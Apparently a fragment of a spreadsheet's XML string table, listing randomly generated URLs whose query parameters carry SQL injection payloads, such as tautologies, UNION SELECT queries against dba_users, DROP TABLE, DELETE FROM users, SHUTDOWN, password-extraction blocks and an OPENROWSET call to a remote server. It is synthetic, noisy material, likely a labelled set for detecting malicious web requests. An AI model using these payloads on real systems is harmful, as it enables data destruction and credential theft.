    <t>/own83rilzpxun_0/os/hydy8y6gxmhhl0j/isnbsgbateiehcisrr9c/iomul/vx_@d@lq5p6stdinh/71fnoi59de/fpvbscript6eqy.7/41eyyslrdxl2yujbs/rcsehkmswsrdelf/nrsrthanne/rncovxiqhzpiwj.mspx?uxaeopnm7l=or++++'dbl'++between++'r'+++++and++++'t'&amp;aslnafwperr4=coin:&amp;0igyqop=hufhilmne&amp;9w9vpujf6location=mwgets&amp;efdtg=i9auetn&amp;noy=65&amp;ie6oeraalmuacoi=lqir&amp;9fhe2afdieu=80189</t>
  </si>
  <si>
    <t>/etutnnnmnootgoht3lf4/ne0p91sajeenn0/yoonysl/mzqdgbfysxoa/ibsqxhua2vs.-o5s/stl4xtermpt/malyxdnreaeaanc3bs/icmac0z6/vvfd/xinsert6orbinjhew.jsp?eevtoktetg=945904741&amp;o8yrssn=211205886&amp;idcdephdr=e/jdiv-daelcsn-iic&amp;hxvihttpservices9fv=ubt+dpkdni0replace&amp;cptug2=6241690&amp;bniealv=k2zfov&amp;thnyinetdo=msp@kf3&amp;l2e02aayrai=m74&amp;tkn4m=ri4sfqgzth&amp;wsock_streamwwopenmnetcatstdinemaila=i+kmail8&amp;heqinqtknd=+|a7|&amp;gxphp-9rvstqc=opag&amp;cguisapg8o3=1c7e&amp;etwaiessln4pb=origtext'or'tg4e'+=++'wepoj8r'</t>
  </si>
  <si>
    <t>/ifvvracdvjzl1ru/eony7/@nuf_ky5anda5s/o2zkefcsxhaieeprsav.gif?nh8nt=chairs'++++union++select+n++++from+++dba_users++++where++name+++like++'%&amp;eeou=+&amp;adtlmiwdekaibis=ntv0oej&amp;stsjnaib4t=yiu;wgautoexecwenvl3ea&amp;eood=mo</t>
  </si>
  <si>
    <t>/y8j.sbo7ll3acceptyr/suksstabbkwnjb6i.js?kcr2ulehs='+++);++delete+from+++users;+++++commit;+++dummy(++++'&amp;aalyie=589265&amp;uasmos=ydg1&amp;0dea=d2x</t>
  </si>
  <si>
    <t>/dtcvsb8dhf4t2yep7/eo6ajhbo1rrbeiu/ufmz6seoezn/e3ie7a4tslk.msf?olni=775259++or+id&gt;8++++or++++ls_id&lt;602</t>
  </si>
  <si>
    <t>/od5ofemm/ttdrkooecyrces/d-exgp_upcfpb/i5/ocqlothuvpchilahpt/g0@bstdin6_/2bm-d4hibdilmolc1s/thfnek/exrzlocsfqgh/b8xm-k.gif?selectscriptwp-aopendjlw=jr&amp;enos6ewo6ehrn=')+un/**/ion++all++++sel/**/ect++'detbrytt',3,78972,'hyz0e1eit',9++from+hkio2t+++++where++++(+++''='&amp;sdca02egl5xno=q&lt;&amp;etbnd7=4958051489&amp;sock_streamxb3qkyphw=rinsertduofn8+i~cpze+3p&amp;fskethct=gdkcocatnneru1uiet&amp;datssmeik=2798985388&amp;odta0gs=t0&amp;ttfynairitri=1625777625</t>
  </si>
  <si>
    <t>/omiihnkeprrats/ginsertr@45r_@kwz/nemi.bin?wazhrenh=33181160&amp;tleonseahf='++++++(+++++select+top+++++1+cioohh+from++lmtra8m)+++++++'&amp;vbxtrcvru=vtsdwgrni3bar35&amp;o2e2ob=t@_nt&amp;oac3=8311&amp;nehteulhtv=h6rea&amp;bm=rbnvk&amp;ieoess=i5q02lw&amp;ie=o5slalisystem+$enull&amp;i1aqoi=nz&amp;bhucjeod=53915&amp;rnrv=0</t>
  </si>
  <si>
    <t>/swwerflt5blctm/v3cguber/tf.bin?futa3ddh5p7nyn=+++++or+2++&gt;+1</t>
  </si>
  <si>
    <t>/e6_ee-m3/pfpasswdqbgroupby/edhsaen/lzt8v8@6no2oaaiwncy5/i7rdhxcmerrkndn.sh?mls7ha=27&amp;aler0n=875135&amp;xk2-httpz.binjs=or+++'aoshnxuh'+++=+++'+++'&amp;rri=43638&amp;hqaisw=40t0je&amp;hkrw3q=mt)re&amp;aiadhipdxsr45=rurvqkey@t</t>
  </si>
  <si>
    <t>/okzvu/hwcldqw-9-62/e@rtr6j/timomtornsi/r@-nyxo/lj_h4/iabssunac/tlr1svw2je@wwa.7.n9./efoh7i40se.h4k1e/f4soom.html?dca=lsihtio'vqc1otng&amp;1jgv=t9_&amp;fpaes=ozislmhibiaeomn&amp;49ti=ti++ooe+&amp;wictun=+nt&amp;shwb8obpbs=ntaia&amp;eat3riitgtoe=ietaccess_logeh&amp;tf=86887&amp;j4btx0fw8nw=5995512&amp;klu3rsamahbjle=tae'/**/union/**/select/**/rnaahcoe/**/from/**/dba_users/**/where/**/lmm5c/**/like/**/'%&amp;7lje=82694807&amp;l0zeq=ndataps@1&amp;urje8snode=9</t>
  </si>
  <si>
    <t>/nukrphq01-b.9/lobb0er/rezm8xpc9cwr5myo54lz/uasi8pesfptqc/myahnn87bq/4_/aiuu2xx.mspx?kn6bisamrxsy_h=jsecat&amp;snr2hi7fdo=ae&lt;(a&amp;1owjt.kj7=347&amp;echo8twinnt=19&amp;any9ualaua=ivdhsoase&amp;eeodstaeerea=stataa&lt;e&amp;nulms=eeatsi&amp;tsabnaet6liayf=45080442&amp;awrhrsesmo=niobject9&amp;eanmscalooaai=';+shutdown--&amp;uitlsem=ne&amp;6yohemetdngru=un2b&amp;rho=67623202&amp;tp42ynn=nie</t>
  </si>
  <si>
    <t>/iosrmnohavinggnullvfxe/yeacfkcrs/tmkm@wqa/sotrqrs2jgnpetwota/teub/g3ac-lquxkhcr8p.nsf?ax=83643454&amp;snmozoosits='select+customer_phone++++'||'from+customers+'||'where++customer_surname='''||++lv_surname||'''++and+++customer_type=1';&amp;er7=47&amp;nmai=e&amp;+ti</t>
  </si>
  <si>
    <t>/t5_im777b8jj3l@h/wreah7it/o.-gb/szy_menw/cvhaqepghem3/tvees0puhnmhn/cgq/aqbfjk-bpf3bvre2lvv/erbnkto75kaash/dtszvcrltlx/tqas.bin?oeh=rn&amp;klikevhuat33gc_=in8c49&amp;ol=-3neus&amp;zenrt7=3362985&amp;lmtwetrelrehi=or++++965=965</t>
  </si>
  <si>
    <t>/0iikp4/ewjtsx1z/sxtph15fngjwdg/id.png?u1kb4iha=iqit]&amp;wkgs0oh7=or+'uldynrsl'+++++between++++'r'+++++and+++++'t'&amp;yi=3346913034&amp;cpjterelasn=de9u2</t>
  </si>
  <si>
    <t>/fg.n6swyq3ap.php?sthiea=kmteh&amp;nwqfromz791zy=rsi&amp;a6owiam=n9f&amp;dd9eo7u=d5h'+++++union++++/**/+++select+weu+++++from+++dba_users++where++essel+++++like++++'%&amp;kctd9hiduesc=lnqrvr2hocogsakihd&amp;8bidupdate=tenbud++&lt;ltre&amp;e0eoorm=618721&amp;atnehmruaesi=n@ner&amp;r8honulllib-k8sz=uewtiwnee|&amp;xlog@c3dks=37313077&amp;oarriwjyp=alinzxwph&amp;-my0es=610708</t>
  </si>
  <si>
    <t>/6sye7rmtpnruqkdy/ov8wyh/oq.mwwu@fhrd.pl?tyetoaeko=earftgn&amp;nslreriylunoa='++++++(++++select+++top+++++1+h9rsacte++++from+++++e9eihia)++++++++'&amp;zyacfe5ee9=?eemmocha&amp;s3sf=y.cso56.w</t>
  </si>
  <si>
    <t>/ifvsc_w/dvi-aind/aerottoiagensinaexaz/wby8zpvpovb.bin?ziinpkw.7pz=007374839&amp;ojechui=a\\7eoh+rti9om&amp;aeetijeih=609di-&amp;6au8seyrh=907166827&amp;essutswrase=jlb3hnbfteolii&amp;woqshr0oefp3=17163672&amp;whofam=';+drop++++table+admin&amp;i1llhkbgy6kg=h=&amp;vni=tzddxyt@</t>
  </si>
  <si>
    <t>/adgdo2sovsees/ox3ltirn-2bbm/akyggxlspasswdnqb/rbzxomm6af.htm?hhdn0marntg='+++);+delete+++from+users;+++commit;++dummy(++'</t>
  </si>
  <si>
    <t>/eehzb88j3.ls5/ghinieebe6rn1/une8-unzobxd/df0j4lm/fotjtaeanwihtgratl/7gnshe6/haeiy/3suhtfoaenrluo/d-80m4nxvkzid/e_yh9myoderyf/muryrcteiirthdgpi.jsp?x3swdx==ora&amp;eeio0eenr=5&amp;i5f_yv8j=19852148&amp;rucsmitttee=g+s?&lt;&amp;9fcao=sec@d&amp;rh3sehaw8ny4=825280&amp;alvpcn=re&amp;6qtahbu=10152&amp;jnhdv5oe='+++);++++delete+++++from++users;++commit;++++dummy(+'&amp;ofddtelnet=sfemayvee9xoohaoay&amp;sghtio9te4erhs=64498782&amp;1wcohb5u=jratzn&amp;et=doswikd+tyoh&gt;sseih&amp;erreysrtsedc=&gt;ye&amp;n53j=4763</t>
  </si>
  <si>
    <t>/p5ncidnflm2rzul/8ymunsr8pawdivk_/ntborqpci2xoa/vx@jz@/z7oocftrwebjz/opfmlxz7vp54fy8q7fu5/nyl.ytwwkwusg2nx1ji.cfm?lwobxsyadpz5=xcw@&amp;qsock_streamwpcyt=exe73aegbrnebd18i&amp;tdhoosg6icinte=3988&amp;nal2bdkaailw=535774&amp;rrscasiege4ma=wft&amp;soeg=44835734&amp;v3toasoes=40hmwtor9mdtyrlekr&amp;unuen=d4whw&amp;qzdivu0j6systemux=';++++begin+++++declare++@ret+++++varchar(8000)++set+@ret=':'+++select++@ret=@ret+'++++'+eii+'/'+password+++++from+++o8+++where+ti&gt;@ret+select+++@ret++as+++ret++into++++foo+++++end--</t>
  </si>
  <si>
    <t>/oscxfitenseeiztg/xluad1@ewi/lpj2debsoinclba5/t5wjegionhv2cfnd/hjbksvkygkbgafsk1u/mac67dyusbzi/hmek3rw8hl65/osw.php3?etck-gzrs=775&amp;smc='++)+++union+++++all+select+7014,4,53,46,38+++++from+++++geh+++++where+++(++''++++=++++'</t>
  </si>
  <si>
    <t>/hjpz9tfw@jlhtpass/lrisa/titdh862olya/eaiiiadk1ao26vym.php3?tmn6wosrtsoez96=iglgi&amp;asbj=l'eve++vhty+hrmmusrndid&amp;mr=or++0&lt;&gt;(select+++++count(*)+++++from+++tibt)&amp;hyhpi=20805407&amp;--eymezhg323=055569&amp;n6nwmghnno=5601254</t>
  </si>
  <si>
    <t>/asploruleh/wzxjl3c-hchjc/rav.3kvujgvwhgcxrqt1/cw8v2xyci-x@d/hoojeardte3/wb/onkc/vs6h/act8/oyprqb-203e3sjs/eetf/srqp9t.aspx?yvadf=lu&amp;it9nvsa03hamsci='+or++++''++=+'&amp;ast2u=lzt</t>
  </si>
  <si>
    <t>/w1yvnpqxe_/etatfesdfeheottahi/okhqfhd/seetlsut/oczh8xskfcihw-ufyexx/aosuoryo/fz/nekwflbqunck2x/onk/aw4b3e9kapm/pteteebeftbleqtsr/tmroir2idin7slot.gif?shgen0o6wvcfeu6='++or+++'ai6edpabo'+=++'++</t>
  </si>
  <si>
    <t>/ux..kaqadminjrd/ikz.gif?lna7vpa1tsuei=+++++or++++2++&gt;+1</t>
  </si>
  <si>
    <t>/ny4kh9p8ll65dxb@he9/igafd4v.png?1ceryao=ohsock_streamsve5erpeewindow.opene&amp;n1k=11&amp;1esdehi7aw='+++)+++union++++all++select++++'cndsysaoek',264,33,'fentua',38++from+++eiermwuo+++where+++(+++''+++=+++'&amp;ifionhw=in1s6&amp;rpoh=t1d-vre&amp;azrmdprqpj=neittgq&amp;iia0l=preese</t>
  </si>
  <si>
    <t>/een8ontnchohiiwm/ta_nz9xi.asmx?nleotoze4s=3110223&amp;lam='+and++++user_name()='oenqt&amp;xpasswdavd9likeq=nn</t>
  </si>
  <si>
    <t>/sdcljqo3lj/vaohbfvfy3_wkt7rmcqy/0dmtj/walodrw0ht/ov/raemtheeeea/lo2qruuu4mitv/ws6mcvuhp9oa-77/zl8/hga/ystdinxo3w/rl4h0htutho61.sh?hnule1nnmie=8&amp;cifn4nashonosoa=select+++aah+from++all_users&amp;mbon=94135&amp;wsfvbscripttyp9boot.ini2=iiznpassthru86oe&amp;wtti=4020275&amp;hnlndn=25887643&amp;vrlrtimatot4=war&lt;&amp;rye5wpa4bmyt=byesock_streameoqisnonntl&amp;ohwechols1fak=63154312</t>
  </si>
  <si>
    <t>/xj0echg_i1juht0daa/gfbagioldaie3luaetei/pna5lazndzlnet/uefidng/tq6okfnv8pwnvcj.tiff?rjurhuiissadrr=;++exec(+'ins'+'ert++into++++users++values(4030,'ft','ihq'))&amp;resrrra6mfh=4448</t>
  </si>
  <si>
    <t>/9zl8dv/au@r.oda/axt/hesmr/oz/tcetmss2/a7vv6ezntyn8@c.swf?z6taodr2=97nlu&amp;ghrh=th&amp;coa5ditaatbdo=eai0bcllenin&amp;enbacirposnl=558234&amp;nd7e=745&amp;oneosed6pn9=1&amp;adivsretutrp=lecpeeohteyehaee3a&amp;9no2l=96472&amp;3enece9apeco=i2r@&amp;ee7t7nc=445653&amp;owffme3nanoan=5ddp8&amp;eucdreplaceautoexeczdu3.r=?&amp;etjcnl7ylo='unionallselectfieldfromransatwhere''++=++'&amp;7tiaesinct=863</t>
  </si>
  <si>
    <t>/f2doxi5rbrsfhir/gwde@y7itguboygqw/t5sheqnh/rabzx9d7hats9p/wpep.w_i4ca/dw5uvqqkxx@x4a/39/of/a-of_r8tnywje/fzy4wse.jpeg?eoitfj7eolhyo='+++++group+++by++users.id++++having+++9773=9773&amp;ewnteneizie76d=0&amp;gwp-0aepasswduoorb=531</t>
  </si>
  <si>
    <t>/cdnas2sesyutiooecb5/1ptcwznqbhdywmvvm6iz/o3c/vpuvm/hixp_e/rmclthtacceshbw.php?newe=40457&amp;igiiisrgisiheof=85164&amp;ah=09617&amp;gh=bwr6kapg&amp;mspyo2=2201&amp;yf2bd='+or++'ahrp'+++++=++n'++&amp;eno3clsnhe=61651756&amp;oq9xec6diexd=pxny4jzs4&amp;ieaititoranouu=pvp3ppos</t>
  </si>
  <si>
    <t>/.ls7ai.bin?a0t=fi'++++union++++all+++select+++osa++++from+++++de++where++++''+='</t>
  </si>
  <si>
    <t>/iutehdwati1i/sogra/gnesi1l/twaop0dohfruitroes.tiff?latflyeq=ti9vkfgdiue&amp;4spn6c='+++++or++++'aaaau7zi7o'+++++=+++'0r'+'ti'</t>
  </si>
  <si>
    <t>/nfvn1/lcov.gif?ivteanrd=having(9fefenhxml$cat)@&amp;dsmtieriuan0tn=ps.o&amp;oilme=';+++++drop+++table+ovrlh</t>
  </si>
  <si>
    <t>/femerahsogoszrc/zruzs0acceptclpassthru/ah@zsikiaxx3lsge4c/n9rixtyithhftuehse/40ukdquggt4qhz/7mxyj7xqncadmink3op/f4kqcvea99/tah8/m9ekjf77bd/sq.exe?3ouqra0hoenkshh=o_pkvo&amp;strne5oy=lelikewherem&amp;airhns=06426&amp;.1vhf='++++union+++++++++++all++++++select+++nhfsreeh++++from++ntdin++where+''+++=+++'&amp;dghlocationd9ia=uftk35&amp;usrnpgpesirljpe=215&amp;u1ace=7tlvgeeterhee&amp;admin10aztdmuag1=2866733</t>
  </si>
  <si>
    <t>/m7rt/.kgp/5wrd.aewfifgej@v/e0fuk@cwjk.jpeg?ohp1jiis=';+++++drop++table++yftb6yqneh&amp;edorlyhspt=ewb8i&amp;qtcna=7336348&amp;nantwsta6at=03339857&amp;e7y6nraat=siidi</t>
  </si>
  <si>
    <t>/onrroerit2/2oxuzlnlrt/dr/fpx/mkt1afhngpr/nlkwtah/iw/8jljak_netcatzdj0v/cz2na@a@1qam9h8ze/_uenp/tesmroe6.asmx?e9love1o5deegeo=eihoctrnbdiu&amp;5qpaaxenhrhs=2998948&amp;mailh2tud.11he=hl&amp;_u.3=37383579&amp;qh3d8aes=+0pa/;ernoe5sfsam9sns&amp;zcqblogtxp_d5=lzcmdge&amp;suidn6drnra=m+pnetcatc&amp;pzs4mqax@=or+2=2</t>
  </si>
  <si>
    <t>/albmmpaclansxti/4b0hiqh1yzm/s-fzwim450zmn6/minr6jf/tth26unmu28zk3n.jpg?emwdmb0jpt=replacedito;&amp;ndhseutsirtaatr='+++++or++++'yehnf'+++++&gt;++++'s</t>
  </si>
  <si>
    <t>/ru3h/ihleaenhwnfto/ye/hhiranptrnimr9rhy/rvpssam/14x1bw/dm98zjbhc/nvaefeqrg/ax.mdb?dessoht=6497814&amp;rruemve=087&amp;cgn=cmanos&amp;ohlena=:&amp;oxnvr=4&amp;q5=micmdd&amp;uegeoet=clxalo5ttdr&amp;qnltto1gcored='++group++++by++++users.id+++++having+++++93974=93974&amp;nmpdrp=teihbuvit0tcue</t>
  </si>
  <si>
    <t>/pwt/saaqhbxehawao0euax5l/itetsts/ek7tc5fexv4.html?hnkroimmejqeumy=';++shutdown--&amp;aemryab=2104817638&amp;niehpnwyaeeo=et-wtnzlkm&amp;lvqi=aie&amp;npt=th4ne3hdhnuqmedn</t>
  </si>
  <si>
    <t>/rd4/n5w@khv./hpeetasekeed5cae/bw_delete.mspx?einodia=scwadz_&amp;ua0rhvssdrera='+++or+'rf3seee'++=++n'++&amp;mnc1d=m7:+processing-instructiontabpls%u8&amp;neteuio=eedb4krdiidet3o&amp;sg=toi4tm]ne&amp;oehttuh2=qeperlpo&amp;idnoesa=rp8ui&amp;ts5=ctd</t>
  </si>
  <si>
    <t>/aaerirmnln5.shtml?mfsoejszlo=uehl&amp;likeaj.mb16s1access_log0=ooiggr&amp;shrcpuk_edk1document5=aewa&amp;be4cd=$na0a&amp;ee9ab5mun=ayfderedn&amp;5t=tspassthruae&amp;2asxathpiao=ycminputl&amp;kxb75o_qvgxp_=(oyre\\obodyidsa1tcips&amp;apeevtpsdehl=nvg&amp;pnntrseoncs=ob1@bi/eaer&lt;y&amp;uhohn59eyanniv=l4eu5auitioffh1aos&amp;rannl3o=oe&lt;t/nm&amp;j7r6x='+or+++'eetny'+++=++n'++</t>
  </si>
  <si>
    <t>/wniejresg/uolzaw/logyt2idck/dwi0bjo7mh7qpq/7byrurjsthbpg8uwa/f17fz3s@y8ii3wi/t6ngddfpfwovml0o6_f/srst/bsyqwtasrpmoq/uuup/fareim.php?rsp1nht0snhlme=or+++++'aoo'++between+++++'r'+and++'t'&amp;.ykyosferded=drtmpdo&amp;wp-bu2vyhttpsvidv=nrnl9ui&amp;eineufo=9281439&amp;wd6trpifiue=nbyhu1&amp;owhotdjow2w=6net&amp;rmsaeyf4sk=bau80d@0z&amp;cl6irzswd5mb=hlmh07wozni5e5&amp;ueolx=re0lbsojrx&amp;2nnptearvshf=tot5zxvp</t>
  </si>
  <si>
    <t>/lhlridxr1t/ehotkmt/soa/tiroeauunntt6/hesgihhegal6rnthan/en04tjs_z/en.gif?omb=';+begin+declare+@ret++++varchar(8000)+++set+@ret=':'+++select++@ret=@ret+'++'+hpw6hhm+'/'+password+++++from++++ieaofvrt+where++mi99etd&gt;@ret+++select++++@ret+++as+++ret+into++foo++++end--&amp;evawts=truservicesp&amp;5mdfynsshnoic=1</t>
  </si>
  <si>
    <t>/n.ig.7.shtml?b3sorrata8nt=dar&amp;ser=rtah57sze&amp;seznrhqar=i&amp;6ll5o9g4eryqll=$dersn%emochabo|e&amp;eohaa12sot=rit&amp;dmtmanuons=84653&amp;dl6azgwuecho=itrqa'+);+delete+from++users+++where+upper(username)++++=++++upper(++++'admin&amp;oqb5ehowntwmu=54083&amp;rn8ionteea7=9yc8vl&amp;sld=6775&amp;ke3g=eooiainimphascdee</t>
  </si>
  <si>
    <t>/i4_uypk/pi/lpiu/tycbkg0tk_dzlbnq4rth/iiuz7w9v3/ou/uvjna/ilikexry8jt3.bin?yelo7oor0=qjap7vx6u&amp;fnzilisnwtte=|di5+csitag1pu&amp;ehaezjubya=asttnre&amp;xs0dkvetcnh1qu=chairs'+++un/**/ion++sel/**/ect++++as++++from+++++dba_users++where+t1oed1td+++like++++'%&amp;fcset=qed&amp;wgsotbsnpoeiaa=1&amp;fygbodydanpxeybgsound=r7_@&amp;ycdeleted=t:b&amp;hslcdf=2182421&amp;3l9yvektet=unionranl&amp;sluavd=3e7dtnas+o(6&amp;ifm9uoj8nxinclude7=mt(&amp;whgteivlhieia=67212&amp;shx07includeb=rrns@s&amp;rhzige2vtnp6ohk=72571</t>
  </si>
  <si>
    <t>/oo23akd1fsca2/uea9ugrqan/lr3085@xaefrbp/hagaqijyho.jpg?m3ant=iardv&amp;aerl0om9u=t+xmlnahri+aagtn&amp;iatntiy2nin=686&amp;ien=055023&amp;clciniaqrte=ii0dor0+efieetxi&amp;eidgsena=1&amp;mlpaltuto=n6y7$0jaxhe&amp;pwrnoykci=nhstb/ma;+?&amp;yjwcwaanose=idxpk70kbd&amp;sfrvtsge=073&amp;ohte=cwtna&amp;1iese4='+++union++++++++all+++++++++select++++keero6aaa+from+++++mdeb+++where++''+++=+'&amp;4fn=]ctnul7r</t>
  </si>
  <si>
    <t>/rchonsmthpi/ttwefmionvh8zti9kpu/tuobigs/rs6hb/yuemg5vk5my-0-l.css?ms4i47enncas=3792841165&amp;ndsclivtro5ej=cf5y&amp;amfbarecuel=;alter+table++++riliiens++set+password+=++++'isyty'++where++++name+=+'sedie';&amp;b4vcmnz=aid</t>
  </si>
  <si>
    <t>/dosubya7utid/ui7sritidihapngvxeyq/umtsvn9oe0ergwg/svn/frdssittcahe/oarvp.css?slieol=a4saz&amp;3qsyd0hcl1cket=kil&amp;tcctqifqp=;+++++insert+++into+++++openrowset(+++'sqloledb','uid=ofh4sin;pwd=ubr;network=dbmssocn;address=32.154.159.184,1433;','select+++++*++from++++_sysdatabases'++);+++select+++++*+++++from+++++linkedorremotesrv1.master.dbo.sysdatabases&amp;gaceu9ag=ttt5sle&amp;hn9link..ys2n=v+</t>
  </si>
  <si>
    <t>/uswex1-/mo9jismscoueyowasxd.cfm?toagrrk8oso8a=or++++'hmtdgseih'++=+++++n'+++++'&amp;aaiaeisotsneahr=986958</t>
  </si>
  <si>
    <t>/iie0rttf/hgo2old5/hgxdr-2libpw/aetteskgrdnns0/m0nnj0ee2/akxs5fklxiib.php4?73r_3=form&lt;svvfilf+ksamen&amp;ceuuseadefna=301131&amp;fnultycofoukeh=')+union++++all+select+++9,6040,2,8,75++++from++++rtkrth++where+++(++++''+++=+++'&amp;swghgwtca=m98isieoiqod&amp;e8hw2=t:cslitrsbh&amp;9tmls6e=aq&amp;iservicesb2rhscripth3e_=og</t>
  </si>
  <si>
    <t>/ifwsutvar4@bxv1rg/sf2e8tk-a_nqi6unl/qjo_y.awy_r/tc29u.shutdownfekrk6/e2.8b.t5yi.js?uchorteeok=i-tvsi0be&amp;styleosklog=3503130&amp;hnt8roe=hr-3is;&amp;suqeo&amp;|dryp&gt;&amp;hiy=nia8cz&amp;onilve=7&amp;risar=r7jowgv3&amp;oiebwetgl=4&amp;tish1kgy=srpczgq&amp;betnrq9o5renja=933&amp;znbhqg9=;+exec++++get_cust(+'x''++++union++select++object_name,object_type,''x''+from++++user_objects++++where+++++''uabhnrhula''+=++''++'+++);&amp;vrpk3a6ixcj=4&amp;uoeyhgirsrsrh4a=zpse+jhstdinc++mttq0&amp;i50gnplqkrtmp=outxlhxmlatstu&amp;dad1lyatghmmia=]pf+ylkt/e@do</t>
  </si>
  <si>
    <t>/om98l7coivrc_@bl6t9/mwpyosf2toinmoro8p5/hjm/dropstzicp3e49iugm/enlo7whhc/twuprchfha.a.v/a7ttes/piftitogntik/hjgwpara33rfi/u7wxsaqfosme/i-ppwrr.jsp?i4vaueasl=u&amp;u8ra=lhmo&amp;oya=htacces1&amp;twpntdherscwtsa=nf&amp;radiisag8w=8&amp;8tshiseht=901128519&amp;cuaj=3738&amp;4nlintbh5sdsves='++++++++(+++++select+++top+1++t2ivkge++from+++tthe)+++++++++'&amp;wyw=4eelipbejxstbn&amp;wzpt@.sx=deebr</t>
  </si>
  <si>
    <t>/sfyhcrq1iwc@27.ecz/put1kfj.b/qq/tekonphveeoea/oiucinteea1osae0/ea/pm-/winntnvbscript372.tiff?ygaomnron=tezcerk2za12&amp;noz1adsdx-dc='++++or+++'m'=++'++&amp;ssgla=oelf1h89&amp;nhoqh5e40ttul=3406938&amp;l0d5ehiflhon=gjo&amp;shmea=17&amp;urub1ln1et=4ty&amp;cuoscyeat1=m)e</t>
  </si>
  <si>
    <t>/nslh7tsnsta/lbkm8/hs_vrnx9d/-jdwaxhzqapk.php?cbcsfo=fj1&amp;rhm38l=08213711&amp;xmlpsdlfbaif4=hhev@s&amp;dxlu=93052209&amp;lone3ewgnn=';+++drop+++table+++++stpvptmneath</t>
  </si>
  <si>
    <t>/hvzd9dtluvk.h4kseh/i8ho.mspx?snuagyrtrmbubne=43288582&amp;agsnin=eedxecmtae&amp;wx9mailfnrousrts='++++or++''++=+++'</t>
  </si>
  <si>
    <t>/6itw4hipqted3z/aots4bbseodef/80mfy30m8cq--szwkk/wf-wgpx3cb7lmnd8h/7kseeuv.iznc9/ni2rs.jsp?1it8ebire0dn=of8betweenumwbulink&gt;75'o&amp;1selhtmse=n2_enulgjmrv&amp;uhotttes=91daiaeertakik&amp;tirer4n1=74696632&amp;s5vq9uhfnwvc='++++/**/+++++or+++/**/''=+'&amp;aamemqo=8014584&amp;hafengyhnl=b0dymaoim91&amp;ecdaaidipgatf4l=02550&amp;dt=esock_stream&gt;&amp;iisbaapgrar=830</t>
  </si>
  <si>
    <t>/itho0g/or5osnrocnzgo1et8peb/z8/tzw9k1goofqay/begfr-klbwvgnnyiwnm/je6tt.sh?gop='+and+++user_name()='pa&amp;1ndk=nu9tnlastada+i&amp;od=e3s4+rg]nkoni&amp;h4d=tljpmop&amp;mha6nl1f=eotegscriptsamom9el&amp;eoertccs=sby7&amp;yse1sat=9enn7emoonooavtl6&amp;ewinae=itetrpzs&amp;hiittemadm4a8lp=47357185&amp;eenyjwtaaesq=dd1z&amp;yrneesdh=55258</t>
  </si>
  <si>
    <t>/uzlw6/2z-jh/ydi/odota/o-eg1ap_1qx/en/ohlttr/qcgmcahsih3dat/yrhtesihe/mei/rdwt7tt5irt8i5saedt.shtml?mnncdnolss=or+++++'ert'+++like+++++'sim%'&amp;7eqfs-of-y=vctdlrehdoeaeae6t&amp;gblcfir5a6f=lehlefj+7]eueprocessing-instruction&amp;qxp_b.bvautoexecp=2oote&amp;tiahldu=35274</t>
  </si>
  <si>
    <t>/itr6ktorhond3s/rzibm8c3s.d/enn2hledht/u@1c_98h1eo/eot/ekyaez0k46ppyzhhuvia/eiealyat/2y9autoexeclrm/ba.dll?nbomaxsav='++++)++union+++++all+++++select+24+++from+++9emeak+++++where+(+++''+='&amp;r0ecdd5noeenl=&gt;drohnso&amp;4_uw1=75318410&amp;brzd52hoo=1196232&amp;deisuaodnsicn=wntrixtermemh&amp;z9jkegdand70=geul&amp;to3npque1=ttiincludefzcdivi&amp;n&amp;xr=229&amp;katymg4tb8f.=)onlocationt&amp;haeeieoln9giro=|t+ua&amp;</t>
  </si>
  <si>
    <t>/agb/9rcu0zechoiuh6bxx/rgzpwboot.iniqmevs6n/oysajeieot8cnu/drqfble@gvoug9/wexeceqcmsde7yxf/hecio7ouynhft/egnvqkh@d4y5@z/ooswlqgzm/oohh47.png?apois4feltscnt8=arimny&amp;rp=hnasewcitaedrt&amp;mmsarmnont=?&amp;jlst7de='++++union+++++select++@@version,1,1,1--</t>
  </si>
  <si>
    <t>/v_3/alxdk/dsrnsa/laatdbdsenaae/8egaseccnuesoipeqde/j09m0a2p/tqw.png?eyhm=p&amp;8n1buhw.@du=14776&amp;ncaiatmoyntne=rcs&amp;togowlrjt1iyews=axnrm&amp;eboems8m4utjo2='+++++/**/+or++++/**/++++'cftrbrxy'+&gt;++'s&amp;fi5dp4n4dsystemg=q9d@1we</t>
  </si>
  <si>
    <t>/yfmisvmdocumentxb9u/isfoz7/a4blu2.jt7y/chzhlink/etfshtariwseott/twun/5fg1slinkpasswd0iw.u.css?5n3adhdeiheetac=526+++or++id&gt;6+++or++ls_id&lt;0912</t>
  </si>
  <si>
    <t>/kv.z/nj/iqhu4waw.asp?acsnnae='++++or++''++='&amp;thits8osr=6634612</t>
  </si>
  <si>
    <t>/n7ddooa4zi-@/echgzk0t3/s8q.ajczt4nv/tko/euxoethth2si/fyadcese2aooa9cynu/pp16lc/rinlcdi/eahtssanedlsdrlirdr/dfwgi35loxzvy.html?ewen=ootl'++++);+++++delete++++from+++users+where++upper(username)+++=++upper(+'admin&amp;yrsncd=[o-scripta</t>
  </si>
  <si>
    <t>/npmomr/erxtaaaa1ztoo0mfl52s.bin?tihria=95361635&amp;a5gg='+)+++union+all+select+++93++from++eienz++where++(++''++=++++'</t>
  </si>
  <si>
    <t>/mkedsllf/w8tjee.gif?sornhldd3rnr='++++or+++++'teths'+++++like+++++'aze%</t>
  </si>
  <si>
    <t>/ganfeeosees7leora/wwqe/omhnhuc33ejomnuee6/lajsj.chsfrhs@d/tp@_094mk57o9/ishshnoys.png?edtkree3irl=ieecaao8da11&amp;63yyedropp@yq=deaey&amp;enjdfoh=5sxjwe&amp;7asedlasu=)&amp;deptnnkerata8=167948992&amp;sz8eprsghi=st+&amp;eddaesangbao=csk4&amp;et8ec=61&amp;u4eoo2urlu7=argeszlooi6ealmesa&amp;olss=';+++++begin++declare+@ret++++varchar(8000)+set++@ret=':'+++select+@ret=@ret+'+++++'+ujstt+'/'+password+++++from+phtiivy+where+++++o1o&gt;@ret++++select++@ret++as+ret+++++into++++foo+end--</t>
  </si>
  <si>
    <t>/egpaf-gb56/arfqensi0/htwe/iijfmusjodssmi1ri/t0fw0ya-4h/ueenrratectuohos/bs/sz-zq/6hkrihd/hweeth95satinh7dshh/olk6ixtfy..cfm?tndftes6t=e3c3ztmpcmdi&amp;rcpkcopynthomees&amp;7awlh=origtext'or'at'='2ti'&amp;cmdymqfwdloc=989787&amp;ostcmadra=8cpet26peyrdtqt&amp;eo=ercpji&amp;rqetzkhesncsdrf=styledoeezihom@oy~h)d5</t>
  </si>
  <si>
